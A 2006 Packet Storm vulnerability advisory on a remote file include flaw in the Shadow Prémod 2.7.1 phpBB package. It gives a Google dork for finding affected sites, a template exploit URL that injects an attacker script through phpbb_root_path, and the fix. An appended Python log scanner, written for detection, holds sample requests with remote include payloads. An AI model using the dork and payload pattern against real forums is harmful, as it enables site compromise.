phpBBShadow.txt

2006-09-07T00:00:00
ID PACKETSTORM:49724
Type packetstorm
Reporter Kw3rLN
Modified 2006-09-07T00:00:00

Description

                                        
                                            `---------------------------------------------------------------------------  
Shadow Prémod <= 2.7.1 [phpbb_root_path] Remote File Include Vulnerability  
---------------------------------------------------------------------------  
  
  
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :  
Remote : Yes  
Critical Level : Dangerous  
Google d0rk: "Dernière version de la Prémod Shadow sur phpBB.biz"  
---------------------------------------------------------------------------  
  
Affected software description :  
~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Application : Shadow Prémod  
version : 2.7.1  
URL : http://premod-shadow.info  
------------------------------------------------------------------  
  
  
Exploit:  
~~~~~  
The variable $phpbb_root_path is not sanitized. When register_globals=on, an attacker can  
exploit this vulnerability with a simple PHP injection script.  
  
# http://www.site.com/[path]/includes/functions_portal.php?phpbb_root_path=[Evil_Script]  
---------------------------------------------------------------------------  
  
Solution :  
~~~~~~~  
Declare the variable $phpbb_root_path before it is used.  
---------------------------------------------------------------------------  
  
  
Shoutz:  
~~~  
  
# Special greetz to my good friend [Oo]  
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]  
---------------------------------------------------------------------------  
  
*/  
  
Contact:  
~~~~~  
  
Nick: Kw3rLn  
E-mail: ciriboflacs[at]YaHoo[dot]Com  
Homepage: hTTp://RST-CREW.NET  
_/*  
  
-------------------------------- [ EOF] ----------------------------------  
  
  
`
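
Added example (not part of the original advisory and not Shadow Prémod code): a Python check that scans web server access logs for requests supplying phpbb_root_path in the query string, as the request shown under "Exploit" does. The log lines, addresses, host name and /forum/ path are constructed sample data, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs

PARAM = "phpbb_root_path"  # variable named in the advisory
# Request field of a common/combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starts with a URL scheme or a data: URI, so the include path leaves the server.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:)", re.I)

# Constructed sample log lines (documentation addresses, placeholder host).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Sep/2006:10:01:02 +0000] "GET /forum/includes/functions_portal.php?phpbb_root_path=http://example.invalid/x.txt? HTTP/1.1" 200 512
203.0.113.7 - - [07/Sep/2006:10:01:09 +0000] "GET /forum/includes/functions_portal.php?phpbb_root_path=hTTp%3A%2F%2Fexample.invalid%2Fx.txt%3F HTTP/1.1" 200 512
198.51.100.4 - - [07/Sep/2006:10:02:00 +0000] "GET /forum/includes/functions_portal.php?phpbb_root_path=./ HTTP/1.0" 200 0
192.0.2.10 - - [07/Sep/2006:10:03:00 +0000] "GET /forum/viewtopic.php?t=42 HTTP/1.1" 200 9001
"""

def classify(line):
    """Return None, 'param-in-request' or 'remote-include-attempt' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    # parse_qs percent-decodes once, as PHP does before register_globals sets the variable.
    values = parse_qs(query, keep_blank_values=True).get(PARAM)
    if values is None:
        return None  # parameter not supplied in the URL
    if any(REMOTE_RE.search(v) for v in values):
        return "remote-include-attempt"
    # Assumption: the forum itself never puts this variable in a URL,
    # so any occurrence in a request is worth reviewing.
    return "param-in-request"

def scan(log_text):
    """Return [(line_number, verdict)] for every flagged line."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE_LOG):
        print(f"line {n}: {verdict}")
```

With register_globals=on the variable can also be set from POST data or cookies, which access logs do not record, so an empty result from this check does not rule out an attempt.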